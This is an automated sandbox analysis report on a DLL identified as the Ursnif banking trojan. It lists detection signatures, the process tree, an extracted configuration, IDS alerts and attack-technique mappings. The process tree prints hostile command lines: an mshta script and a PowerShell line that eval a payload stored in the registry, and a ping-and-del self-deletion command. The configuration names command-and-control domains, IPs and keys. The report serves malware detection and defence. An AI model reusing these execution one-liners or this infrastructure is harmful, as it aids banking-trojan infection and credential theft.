Windows
Analysis Report
XoVzWJQAQ0.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 6232 cmdline: loaddll32.exe "C:\Users\user\Desktop\XoVzWJQAQ0.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
- cmd.exe (PID: 6256 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\XoVzWJQAQ0.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
- rundll32.exe (PID: 6352 cmdline: rundll32.exe "C:\Users\user\Desktop\XoVzWJQAQ0.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- control.exe (PID: 6596 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 5972 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\XoVzWJQAQ0.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 1220 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- RuntimeBroker.exe (PID: 4168 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
- cmd.exe (PID: 1656 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1BBD.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- mshta.exe (PID: 4804 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Hli6='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hli6).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 6000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name elbnsvbf -value gp; new-alias -name dbiansi -value iex; dbiansi ([System.Text.Encoding]::ASCII.GetString((elbnsvbf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 6268 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\suyq54bl.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 1112 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES99B1.tmp" "c:\Users\user\AppData\Local\Temp\CSCA3AF429E64284F6FBA5C7EF0C7D44D.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 6536 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\que4qvkg.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 7088 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB529.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B2F5B9E5B5E42FBBCD6AAD130D3A7FD.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
⊘No Sigma rule has matched
Timestamp: | 05/04/22-16:26:18.722944 |
SID: | 2033203 |
Source Port: | 49743 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:26:39.201905 |
SID: | 2033203 |
Source Port: | 49748 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:26:39.682098 |
SID: | 2033203 |
Source Port: | 49748 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/04/22-16:26:38.797354 |
SID: | 2033203 |
Source Port: | 49748 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_00FB5FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_053765C2 | |
Source: | Code function: | 2_2_053799BC | |
Source: | Code function: | 2_2_0538BAD1 |
Source: | Code function: | 2_2_0537FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_00FB1CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: |
Source: | Binary or memory string: |
E-Banking Fraud |
---|
Source: | File source: |
Source: | Registry key value created / modified: | Jump to behavior |
Source: | Code function: | 2_2_00FB5FBB |
System Summary |
---|
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Code function: | 2_2_00FB829C | |
Source: | Code function: | 2_2_00FB1645 | |
Source: | Code function: | 2_2_00FB4BF1 | |
Source: | Code function: | 2_2_0538154D | |
Source: | Code function: | 2_2_05393DB0 | |
Source: | Code function: | 2_2_0538FF4D | |
Source: | Code function: | 2_2_0538D7F1 | |
Source: | Code function: | 2_2_053767CA | |
Source: | Code function: | 2_2_0537B238 |
Source: | Code function: | 2_2_05388E57 |
Source: | Code function: | 2_2_00FB4321 | |
Source: | Code function: | 2_2_00FB6D0A | |
Source: | Code function: | 2_2_00FB190C | |
Source: | Code function: | 2_2_00FB84C1 | |
Source: | Code function: | 2_2_05386DE0 | |
Source: | Code function: | 2_2_0537C431 | |
Source: | Code function: | 2_2_053774AE | |
Source: | Code function: | 2_2_05380782 | |
Source: | Code function: | 2_2_0538BE80 | |
Source: | Code function: | 2_2_0537710A | |
Source: | Code function: | 2_2_05387950 | |
Source: | Code function: | 2_2_053861AE | |
Source: | Code function: | 2_2_0538A806 | |
Source: | Code function: | 2_2_053800DC | |
Source: | Code function: | 2_2_05382331 | |
Source: | Code function: | 2_2_05385312 | |
Source: | Code function: | 2_2_053764C4 | |
Source: | Code function: | 2_2_0537D77A | |
Source: | Code function: | 2_2_0537B7D5 | |
Source: | Code function: | 2_2_053736BB | |
Source: | Code function: | 2_2_05383829 | |
Source: | Code function: | 2_2_053710C7 | |
Source: | Code function: | 2_2_05385220 | |
Source: | Code function: | 2_2_0538EAC5 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_00FB68BD |
Source: | Process created: |
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_00FB7EA9 | |
Source: | Code function: | 2_2_00FB829B | |
Source: | Code function: | 2_2_05393DAF | |
Source: | Code function: | 2_2_05373496 | |
Source: | Code function: | 2_2_053938A9 |
Source: | Static PE information: |
Source: | Code function: | 2_2_0537EC00 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: | ||
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_053765C2 | |
Source: | Code function: | 2_2_053799BC | |
Source: | Code function: | 2_2_0538BAD1 |
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_0537FD47 |
Source: | Binary or memory string: |
Source: | Code function: | 2_2_0537EC00 |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_05378FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Memory protected: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 2_2_00FB3365 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_053881F1 |
Source: | Code function: | 2_2_00FB76BB |
Source: | Code function: | 2_2_00FB6D78 |
Source: | Code function: | 2_2_00FB3365 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | 1 Input Capture | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 11 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 11 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 1 System Network Configuration Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
39% | Virustotal | Browse | ||
50% | ReversingLabs | Win32.Trojan.Jaik | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 620331 |
Start date and time: | 2022-05-04 16:25:03 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 30s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | XoVzWJQAQ0.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 37 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@26/16@0/2 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.42.16
- Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 4804 because there are no executed functions
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
16:26:11 | API Interceptor | |
16:26:49 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.189.151.28 | Get hash | malicious | Browse | ||
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-SOFTPLUSCH | Get hash | malicious | Browse |
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
MD5: | 243581397F734487BD471C04FB57EA44 |
SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1117426676935867 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8ak7YnqqyPN5Dlq5J:+RI+ycuZhNqakSyPNnqX |
MD5: | 81A736AC827123F39B6359777F5E5BBD |
SHA1: | 0F2A64DBADDE3ABBCDDF1B17A1DE7BA41BE6CD55 |
SHA-256: | DB505E64229027A77C2819094BA11750F878CED1B4F23819525207048CE5D0E7 |
SHA-512: | 158372042033EF3A0237E1EB7C2F749555EAAA29BFE6918127136C6224BC0F65677ED40A9ED275A2982DD9B24A27C04B8988E67C4BB72026DCB12311E9F9D163 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.103509438315902 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygkak7YnqqjpPN5Dlq5J:+RI+ycuZhN7akStPNnqX |
MD5: | 1AF6050D45F0118CF9A5B77EC990A0EA |
SHA1: | 766FB109DD78AE9FBBA39D181C05B75F4B9B4D53 |
SHA-256: | F6C2D364DBB3E043831928F78C9B6971CB3449141F7AD81B08B16AFA7214A16F |
SHA-512: | 732241A37E7F241A4D7219B3E6D17842400500CDE1D136EC18AFD7867FB09E474D34DCD39638D6759F1626586C29A6EA4899C5B394A65152819AC40BE7C9ABB9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9824475480583934 |
Encrypted: | false |
SSDEEP: | 24:HxnW91pCI7MhHVQhKdNWI+ycuZhN7akStPNnq9hgd:18pCuI1yKd41ul7a33q9y |
MD5: | 8D7B62E2FB8D62EEC206C1BDD4D84CF4 |
SHA1: | CF14D79B975022C0FD0B0B8E3DF22FF86CEBDAC9 |
SHA-256: | F009BFB82306048220092EC281AA86277A986B5A7DE65E5F3A3AC52AF6253F77 |
SHA-512: | FF600E585970531CF6CD09B0D6135E92B86E4CA73DC49DC290F04289AF678F1B271D0187D009E3C8CA26ECE4E968A4B9DCB67053DC4B293440EA60542EBBA7B9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9934039832266293 |
Encrypted: | false |
SSDEEP: | 24:HRh6nW9r2XhH5hKdNWI+ycuZhNqakSyPNnq9hgd:MW2xnKd41ulqa3eq9y |
MD5: | 17AC15A18FC3FB762C4679863838E116 |
SHA1: | D9B5577D614DB878349EFD58E3FEA8021AE93B82 |
SHA-256: | B66B79700202020FA9205C28A5443DA3F40C09AC6B8D3FF6E14D093B85FCFFB3 |
SHA-512: | F2CB720CE1FE89216E3019647C92C65AFB0621148FDBA7AE8D105D1F7FA380CFD310DB849FCB9B98D3C2869461EBFA06E0AE724059F553E8D9D298B758A3CB2E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.296878990077811 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f9Szxs7+AEszIWXp+N23f91x:p37Lvkmb6KH1SWZE81X |
MD5: | CA7BF0117043C777407779138BC196D6 |
SHA1: | 1730939F55EE070B21B5CCB511B42CEE36D39917 |
SHA-256: | A7EC919AEB3C1D91AB60C780CF7F96AE14C3B5891975067A6B0459C40F1AC13A |
SHA-512: | 33639558DC6ED73B7F7F132147AE7DEF4D748479C51BCB50CB2BF02FDD19BA2F50C8DC958C2B49961A2D279707557940EBEB7B2E07B40EB2B81BEB02A40985F3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.5954695100905196 |
Encrypted: | false |
SSDEEP: | 24:etGS9/u2Bg85z7xlfwZD6MgdWqtkZfw/WI+ycuZhNqakSyPNnq:6QYb5hFCD6lWdJwu1ulqa3eq |
MD5: | 3FA05E8CA29FC933EE62D95D319196F4 |
SHA1: | 67950CB77C6C396B7CFA0A0298121D5E3DA46884 |
